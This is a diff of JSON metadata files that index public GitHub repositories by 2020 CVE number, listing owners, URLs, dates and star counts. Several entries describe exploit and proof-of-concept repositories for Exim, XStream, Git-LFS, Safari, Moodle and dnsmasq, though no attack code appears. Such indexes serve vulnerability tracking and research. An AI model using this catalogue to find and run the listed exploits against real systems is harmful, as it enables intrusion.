+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-25613.json b/2020/CVE-2020-25613.json
new file mode 100644
index 0000000000..7af4ea6be5
--- /dev/null
+++ b/2020/CVE-2020-25613.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 475668293,
+ "name": "CVE-2020-25613",
+ "full_name": "metapox\/CVE-2020-25613",
+ "owner": {
+ "login": "metapox",
+ "id": 84276752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84276752?v=4",
+ "html_url": "https:\/\/github.com\/metapox"
+ },
+ "html_url": "https:\/\/github.com\/metapox\/CVE-2020-25613",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-30T00:51:08Z",
+ "updated_at": "2022-03-30T00:51:53Z",
+ "pushed_at": "2022-03-30T00:51:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25627.json b/2020/CVE-2020-25627.json
new file mode 100644
index 0000000000..2d8bbb2aad
--- /dev/null
+++ b/2020/CVE-2020-25627.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 378117229,
+ "name": "CVE-2020-25627",
+ "full_name": "HoangKien1020\/CVE-2020-25627",
+ "owner": {
+ "login": "HoangKien1020",
+ "id": 24661746,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4",
+ "html_url": "https:\/\/github.com\/HoangKien1020"
+ },
+ "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-25627",
+ "description": "Stored XSS via moodlenetprofile parameter in user profile",
+ "fork": false,
+ "created_at": "2021-06-18T10:37:23Z",
+ "updated_at": "2023-08-20T10:15:52Z",
+ "pushed_at": "2021-06-18T10:48:17Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-256480.json b/2020/CVE-2020-256480.json
new file mode 100644
index 0000000000..6c776d2f74
--- /dev/null
+++ b/2020/CVE-2020-256480.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 470630889,
+ "name": "cve-2022-25640-exploit",
+ "full_name": "dim0x69\/cve-2022-25640-exploit",
+ "owner": {
+ "login": "dim0x69",
+ "id": 1571696,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1571696?v=4",
+ "html_url": "https:\/\/github.com\/dim0x69"
+ },
+ "html_url": "https:\/\/github.com\/dim0x69\/cve-2022-25640-exploit",
+ "description": "Exploitation of CVE-2020-256480 using scapy",
+ "fork": false,
+ "created_at": "2022-03-16T14:59:08Z",
+ "updated_at": "2022-03-29T00:14:52Z",
+ "pushed_at": "2022-03-16T15:05:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25686.json b/2020/CVE-2020-25686.json
new file mode 100644
index 0000000000..c6301180dc
--- /dev/null
+++ b/2020/CVE-2020-25686.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 332287630,
+ "name": "dnspooq",
+ "full_name": "knqyf263\/dnspooq",
+ "owner": {
+ "login": "knqyf263",
+ "id": 2253692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4",
+ "html_url": "https:\/\/github.com\/knqyf263"
+ },
+ "html_url": "https:\/\/github.com\/knqyf263\/dnspooq",
+ "description": "DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)",
+ "fork": false,
+ "created_at": "2021-01-23T19:07:18Z",
+ "updated_at": "2024-05-29T13:16:45Z",
+ "pushed_at": "2021-01-24T09:05:40Z",
+ "stargazers_count": 94,
+ "watchers_count": 94,
+ "has_discussions": false,
+ "forks_count": 41,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 41,
+ "watchers": 94,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-25782.json b/2020/CVE-2020-25782.json
new file mode 100644
index 0000000000..7218b6f894
--- /dev/null
+++ b/2020/CVE-2020-25782.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 333133885,
+ "name": "accfly",
+ "full_name": "tezeb\/accfly",
+ "owner": {
+ "login": "tezeb",
+ "id": 10117277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10117277?v=4",
+ "html_url": "https:\/\/github.com\/tezeb"
+ },
+ "html_url": "https:\/\/github.com\/tezeb\/accfly",
+ "description": "Disclosure of Accfly camera vulnerabilities: CVE-2020-25782, CVE-2020-25783, CVE-2020-25784, CVE-2020-25785.",
+ "fork": false,
+ "created_at": "2021-01-26T15:48:27Z",
+ "updated_at": "2021-11-29T06:21:50Z",
+ "pushed_at": "2021-01-26T17:03:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-26217.json b/2020/CVE-2020-26217.json
index ff8058d1b0..5bfd6baf0d 100644
--- a/2020/CVE-2020-26217.json
+++ b/2020/CVE-2020-26217.json
@@ -29,6 +29,40 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 331904602,
+ "name": "CVE-2020-26217",
+ "full_name": "Al1ex\/CVE-2020-26217",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26217",
+ "description": "CVE-2020-26217 && XStream RCE",
+ "fork": false,
+ "created_at": "2021-01-22T09:56:11Z",
+ "updated_at": "2023-09-28T11:24:13Z",
+ "pushed_at": "2021-01-22T09:56:30Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-26217",
+ "rce",
+ "xstream"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 808796135,
"name": "XStream-1",
diff --git a/2020/CVE-2020-26233.json b/2020/CVE-2020-26233.json
index 3ec4cde775..c6f9089d8c 100644
--- a/2020/CVE-2020-26233.json
+++ b/2020/CVE-2020-26233.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 495741457,
+ "name": "test_CVE-2020-26233",
+ "full_name": "whr819987540\/test_CVE-2020-26233",
+ "owner": {
+ "login": "whr819987540",
+ "id": 68956118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68956118?v=4",
+ "html_url": "https:\/\/github.com\/whr819987540"
+ },
+ "html_url": "https:\/\/github.com\/whr819987540\/test_CVE-2020-26233",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-24T08:49:01Z",
+ "updated_at": "2022-05-24T08:49:01Z",
+ "pushed_at": "2022-05-24T08:49:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 558712106,
"name": "CVE-2020-26233",
diff --git a/2020/CVE-2020-26258.json b/2020/CVE-2020-26258.json
new file mode 100644
index 0000000000..83e0b9405f
--- /dev/null
+++ b/2020/CVE-2020-26258.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 331887269,
+ "name": "CVE-2020-26258",
+ "full_name": "Al1ex\/CVE-2020-26258",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26258",
+ "description": "CVE-2020-26258 && XStream SSRF",
+ "fork": false,
+ "created_at": "2021-01-22T08:44:24Z",
+ "updated_at": "2023-09-28T11:24:12Z",
+ "pushed_at": "2021-01-22T08:44:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-26258",
+ "ssrf",
+ "xstream"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-26259.json b/2020/CVE-2020-26259.json
index 2030b8858c..aa057d6639 100644
--- a/2020/CVE-2020-26259.json
+++ b/2020/CVE-2020-26259.json
@@ -28,5 +28,38 @@
"watchers": 27,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 331896682,
+ "name": "CVE-2020-26259",
+ "full_name": "Al1ex\/CVE-2020-26259",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26259",
+ "description": "CVE-2020-26259 &&XStream Arbitrary File Delete",
+ "fork": false,
+ "created_at": "2021-01-22T09:23:28Z",
+ "updated_at": "2023-09-28T11:24:13Z",
+ "pushed_at": "2021-01-22T09:23:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-26259",
+ "xstream"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-27223.json b/2020/CVE-2020-27223.json
index 20aafc436a..2b804fe74b 100644
--- a/2020/CVE-2020-27223.json
+++ b/2020/CVE-2020-27223.json
@@ -1,4 +1,64 @@
[
+ {
+ "id": 349293150,
+ "name": "CVE-2020-27223",
+ "full_name": "motikan2010\/CVE-2020-27223",
+ "owner": {
+ "login": "motikan2010",
+ "id": 3177297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4",
+ "html_url": "https:\/\/github.com\/motikan2010"
+ },
+ "html_url": "https:\/\/github.com\/motikan2010\/CVE-2020-27223",
+ "description": "CVE-2020-27223 Vulnerability App & PoC",
+ "fork": false,
+ "created_at": "2021-03-19T03:50:45Z",
+ "updated_at": "2022-08-20T15:15:39Z",
+ "pushed_at": "2021-03-19T17:55:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 397512022,
+ "name": "Jetty-CVE-2020-27223",
+ "full_name": "ttestoo\/Jetty-CVE-2020-27223",
+ "owner": {
+ "login": "ttestoo",
+ "id": 26863498,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26863498?v=4",
+ "html_url": "https:\/\/github.com\/ttestoo"
+ },
+ "html_url": "https:\/\/github.com\/ttestoo\/Jetty-CVE-2020-27223",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-18T07:28:55Z",
+ "updated_at": "2021-08-18T08:59:32Z",
+ "pushed_at": "2021-08-18T08:59:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 719426863,
"name": "Jetty_v9.4.31_CVE-2020-27223_beforepatch",
diff --git a/2020/CVE-2020-27301.json b/2020/CVE-2020-27301.json
new file mode 100644
index 0000000000..832a5524f6
--- /dev/null
+++ b/2020/CVE-2020-27301.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486463960,
+ "name": "CVE-2020-27301-hostapd",
+ "full_name": "chertoGUN\/CVE-2020-27301-hostapd",
+ "owner": {
+ "login": "chertoGUN",
+ "id": 59345544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59345544?v=4",
+ "html_url": "https:\/\/github.com\/chertoGUN"
+ },
+ "html_url": "https:\/\/github.com\/chertoGUN\/CVE-2020-27301-hostapd",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T05:53:42Z",
+ "updated_at": "2022-04-19T19:14:52Z",
+ "pushed_at": "2022-04-23T16:43:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-27824.json b/2020/CVE-2020-27824.json
new file mode 100644
index 0000000000..d67c5358ff
--- /dev/null
+++ b/2020/CVE-2020-27824.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483206761,
+ "name": "openjpeg-2.3.0_CVE-2020-27824",
+ "full_name": "pazhanivel07\/openjpeg-2.3.0_CVE-2020-27824",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/openjpeg-2.3.0_CVE-2020-27824",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-19T10:53:52Z",
+ "updated_at": "2023-04-11T01:17:59Z",
+ "pushed_at": "2022-04-19T10:56:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-27904.json b/2020/CVE-2020-27904.json
new file mode 100644
index 0000000000..13ca91aca7
--- /dev/null
+++ b/2020/CVE-2020-27904.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 353295215,
+ "name": "xattr-oob-swap",
+ "full_name": "pattern-f\/xattr-oob-swap",
+ "owner": {
+ "login": "pattern-f",
+ "id": 48882723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48882723?v=4",
+ "html_url": "https:\/\/github.com\/pattern-f"
+ },
+ "html_url": "https:\/\/github.com\/pattern-f\/xattr-oob-swap",
+ "description": "Demo exploit code for CVE-2020-27904, a tfp0 bug.",
+ "fork": false,
+ "created_at": "2021-03-31T09:11:29Z",
+ "updated_at": "2024-06-02T17:29:33Z",
+ "pushed_at": "2021-04-29T07:14:33Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-27930.json b/2020/CVE-2020-27930.json
new file mode 100644
index 0000000000..1c25caf12d
--- /dev/null
+++ b/2020/CVE-2020-27930.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 336769736,
+ "name": "Apple-Safari-Remote-Code-Execution-CVE-2020-27930",
+ "full_name": "FunPhishing\/Apple-Safari-Remote-Code-Execution-CVE-2020-27930",
+ "owner": {
+ "login": "FunPhishing",
+ "id": 77312720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4",
+ "html_url": "https:\/\/github.com\/FunPhishing"
+ },
+ "html_url": "https:\/\/github.com\/FunPhishing\/Apple-Safari-Remote-Code-Execution-CVE-2020-27930",
+ "description": "Apple Safari Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-02-07T11:28:21Z",
+ "updated_at": "2021-02-07T11:30:11Z",
+ "pushed_at": "2021-02-07T11:30:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-27955.json b/2020/CVE-2020-27955.json
index 02b3fb20e7..a04ae5a9e3 100644
--- a/2020/CVE-2020-27955.json
+++ b/2020/CVE-2020-27955.json
@@ -179,6 +179,306 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 352905168,
+ "name": "CVE-2020-27955",
+ "full_name": "NeoDarwin\/CVE-2020-27955",
+ "owner": {
+ "login": "NeoDarwin",
+ "id": 35026625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35026625?v=4",
+ "html_url": "https:\/\/github.com\/NeoDarwin"
+ },
+ "html_url": "https:\/\/github.com\/NeoDarwin\/CVE-2020-27955",
+ "description": "CVE-2020-27955 Poc",
+ "fork": false,
+ "created_at": "2021-03-30T07:12:11Z",
+ "updated_at": "2021-03-30T07:19:13Z",
+ "pushed_at": "2021-03-30T07:19:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 363093968,
+ "name": "CVE-2020-27955-LFS",
+ "full_name": "DeeLMind\/CVE-2020-27955-LFS",
+ "owner": {
+ "login": "DeeLMind",
+ "id": 18142084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18142084?v=4",
+ "html_url": "https:\/\/github.com\/DeeLMind"
+ },
+ "html_url": "https:\/\/github.com\/DeeLMind\/CVE-2020-27955-LFS",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-30T09:38:48Z",
+ "updated_at": "2021-05-02T15:22:19Z",
+ "pushed_at": "2021-04-30T09:43:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 363165166,
+ "name": "CVE-2020-27955",
+ "full_name": "HK69s\/CVE-2020-27955",
+ "owner": {
+ "login": "HK69s",
+ "id": 61073603,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61073603?v=4",
+ "html_url": "https:\/\/github.com\/HK69s"
+ },
+ "html_url": "https:\/\/github.com\/HK69s\/CVE-2020-27955",
+ "description": "CVE-2020-27955",
+ "fork": false,
+ "created_at": "2021-04-30T14:25:42Z",
+ "updated_at": "2021-04-30T14:29:08Z",
+ "pushed_at": "2021-04-30T14:29:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 364796273,
+ "name": "CVE-2020-27955",
+ "full_name": "IanSmith123\/CVE-2020-27955",
+ "owner": {
+ "login": "IanSmith123",
+ "id": 19611084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19611084?v=4",
+ "html_url": "https:\/\/github.com\/IanSmith123"
+ },
+ "html_url": "https:\/\/github.com\/IanSmith123\/CVE-2020-27955",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-06T05:36:05Z",
+ "updated_at": "2021-05-06T05:39:20Z",
+ "pushed_at": "2021-05-06T05:39:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 367014200,
+ "name": "CVE-2020-27955",
+ "full_name": "Arnoldqqq\/CVE-2020-27955",
+ "owner": {
+ "login": "Arnoldqqq",
+ "id": 62465887,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62465887?v=4",
+ "html_url": "https:\/\/github.com\/Arnoldqqq"
+ },
+ "html_url": "https:\/\/github.com\/Arnoldqqq\/CVE-2020-27955",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-13T10:30:28Z",
+ "updated_at": "2021-05-13T10:33:03Z",
+ "pushed_at": "2021-05-13T10:33:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 369939082,
+ "name": "CVE-2020-27955",
+ "full_name": "nob0dy-3389\/CVE-2020-27955",
+ "owner": {
+ "login": "nob0dy-3389",
+ "id": 84649589,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84649589?v=4",
+ "html_url": "https:\/\/github.com\/nob0dy-3389"
+ },
+ "html_url": "https:\/\/github.com\/nob0dy-3389\/CVE-2020-27955",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-23T01:40:11Z",
+ "updated_at": "2021-05-23T01:42:59Z",
+ "pushed_at": "2021-05-23T01:42:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 370741007,
+ "name": "CVE-2020-27955-LFS",
+ "full_name": "Marsable\/CVE-2020-27955-LFS",
+ "owner": {
+ "login": "Marsable",
+ "id": 43372011,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43372011?v=4",
+ "html_url": "https:\/\/github.com\/Marsable"
+ },
+ "html_url": "https:\/\/github.com\/Marsable\/CVE-2020-27955-LFS",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-25T15:26:35Z",
+ "updated_at": "2021-05-25T15:28:08Z",
+ "pushed_at": "2021-05-25T15:28:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 377948316,
+ "name": "CVE-2020-27955",
+ "full_name": "FrostsaberX\/CVE-2020-27955",
+ "owner": {
+ "login": "FrostsaberX",
+ "id": 24857203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24857203?v=4",
+ "html_url": "https:\/\/github.com\/FrostsaberX"
+ },
+ "html_url": "https:\/\/github.com\/FrostsaberX\/CVE-2020-27955",
+ "description": "Git-LFS RCE Test",
+ "fork": false,
+ "created_at": "2021-06-17T20:04:33Z",
+ "updated_at": "2023-09-28T11:28:46Z",
+ "pushed_at": "2021-06-17T20:58:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 391941607,
+ "name": "CVE-2020-27955-LFS-main",
+ "full_name": "whitetea2424\/CVE-2020-27955-LFS-main",
+ "owner": {
+ "login": "whitetea2424",
+ "id": 80032455,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80032455?v=4",
+ "html_url": "https:\/\/github.com\/whitetea2424"
+ },
+ "html_url": "https:\/\/github.com\/whitetea2424\/CVE-2020-27955-LFS-main",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-02T12:32:08Z",
+ "updated_at": "2021-08-02T13:13:28Z",
+ "pushed_at": "2021-08-02T13:13:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 481308105,
+ "name": "cve-2020-27955",
+ "full_name": "userxfan\/cve-2020-27955",
+ "owner": {
+ "login": "userxfan",
+ "id": 103595009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103595009?v=4",
+ "html_url": "https:\/\/github.com\/userxfan"
+ },
+ "html_url": "https:\/\/github.com\/userxfan\/cve-2020-27955",
+ "description": "cve-2020-27955",
+ "fork": false,
+ "created_at": "2022-04-13T17:16:48Z",
+ "updated_at": "2022-06-09T12:06:24Z",
+ "pushed_at": "2022-06-09T12:07:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 578921503,
"name": "CVE-2020-27955",
diff --git a/2020/CVE-2020-28018.json b/2020/CVE-2020-28018.json
new file mode 100644
index 0000000000..701c2cf71f
--- /dev/null
+++ b/2020/CVE-2020-28018.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 367662074,
+ "name": "CVE-2020-28018",
+ "full_name": "dorkerdevil\/CVE-2020-28018",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2020-28018",
+ "description": "exim use after free exploit and detection",
+ "fork": false,
+ "created_at": "2021-05-15T15:09:05Z",
+ "updated_at": "2023-11-30T06:49:01Z",
+ "pushed_at": "2021-05-15T15:10:23Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 368612795,
+ "name": "CVE-2020-28018",
+ "full_name": "zr0tt\/CVE-2020-28018",
+ "owner": {
+ "login": "zr0tt",
+ "id": 43872162,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43872162?v=4",
+ "html_url": "https:\/\/github.com\/zr0tt"
+ },
+ "html_url": "https:\/\/github.com\/zr0tt\/CVE-2020-28018",
+ "description": "Exploit for Exim4 4.93 CVE-2020-28018",
+ "fork": false,
+ "created_at": "2021-05-18T17:22:45Z",
+ "updated_at": "2023-09-29T08:38:34Z",
+ "pushed_at": "2021-05-18T17:25:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
